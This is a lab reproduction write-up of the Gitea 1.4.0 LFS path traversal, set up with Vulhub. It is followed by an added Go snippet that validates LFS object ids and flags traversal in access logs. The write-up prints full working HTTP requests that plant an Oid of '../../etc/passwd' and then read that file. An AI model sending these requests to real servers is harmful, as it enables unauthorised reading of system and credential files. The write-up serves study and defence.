Gitea 1.4 Unauthenticated Remote Code Execution: Vulnerability Reproduction

Gitea 1.4 Unauthenticated Remote Code Execution

1. Vulnerability description

Gitea is an open-source project forked from Gogs: a multi-user Git repository management platform similar to GitHub and GitLab. Version 1.4.0 contains a logic error that lets an unauthenticated user traverse directories and read or write arbitrary files, which ultimately allows arbitrary command execution.

2. Affected versions

1.4.0

3. Environment setup and vulnerability reproduction

The environment is built with Vulhub:

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce

Pull the image and start the environment:

docker-compose up -d

The environment started successfully.

Initial configuration:

http://192.168.1.108:3000/install

Leave the other settings at their defaults and set the administrator account and password:

Initialization completed successfully; the dashboard is now accessible.

After installation, create a new user and then create a public repository.

Create a public repository:

Repository created successfully.

The Gitea service needs to be restarted:

docker-compose restart

Vulnerability verification:

The full request:

POST /lostworld/getpasswd.git/info/lfs/objects HTTP/1.1
Host: 192.168.1.108:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52
Accept: application/vnd.git-lfs+json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=lA-gqD5gapHJeeQEz_XUOsejTSY6MTYwOTk4NzQ3MTAwNDc0MzE3OQ%3D%3D
Connection: close
Content-Length: 153

{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}

A 401 response indicates that the LFS object described by the request has been created, with its Oid set to ....../../../etc/passwd.

Then access the path:

http://192.168.1.108:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

The full read request:

GET /lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
Host: 192.168.1.108:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: lang=zh-CN; i_like_gitea=19fae7187e6a86e2; _csrf=y0uGd4qsOuq8esEW9S4hXHWRGHo6MTYwOTk4ODAwNzczODc4NzI3MQ%3D%3D
Connection: close
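The root cause is that the Oid from the request body is used as a path component without first being checked against the LFS object-id format. As a defensive complement, added here and not part of the original write-up or of Gitea's own code, the Go snippet below validates an Oid and scans constructed access-log lines for LFS object requests whose Oid segment is not a 64-character hex SHA-256, which is how this traversal shows up in web-server logs; the log line format and the sample lines are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// An LFS object id is the SHA-256 of the content: 64 lowercase hex chars.
// Reject anything else (e.g. "....../../../etc/passwd") before it reaches a path.
var lfsOidPattern = regexp.MustCompile(`^[a-f0-9]{64}$`)

// ValidLFSOid reports whether oid is a well-formed LFS object id.
func ValidLFSOid(oid string) bool {
	return lfsOidPattern.MatchString(oid)
}

// SuspiciousLFSRequests returns lines of the constructed form
// "METHOD /owner/repo.git/info/lfs/objects/<oid>[/...] HTTP/1.1" whose Oid is
// not a valid object id; "batch" is the LFS batch endpoint, not an Oid.
func SuspiciousLFSRequests(lines []string) []string {
	const marker = "/info/lfs/objects/"
	var hits []string
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 2 || !strings.Contains(fields[1], marker) {
			continue
		}
		// First segment after the marker, percent-decoded as the server would.
		rest := fields[1][strings.Index(fields[1], marker)+len(marker):]
		seg := strings.SplitN(rest, "/", 2)[0]
		if dec, err := url.PathUnescape(seg); err == nil {
			seg = dec
		}
		if seg != "batch" && !ValidLFSOid(seg) {
			hits = append(hits, line)
		}
	}
	return hits
}

func main() {
	// Constructed samples: the read request above, then a benign LFS fetch.
	sample := []string{
		"GET /lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1",
		"GET /alice/project.git/info/lfs/objects/" + strings.Repeat("ab", 32) + " HTTP/1.1",
	}
	fmt.Println(SuspiciousLFSRequests(sample)) // only the traversal line
}
```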

Published: 2021-02-13 13:35:00

Last modified: 2021-02-13 13:35:00
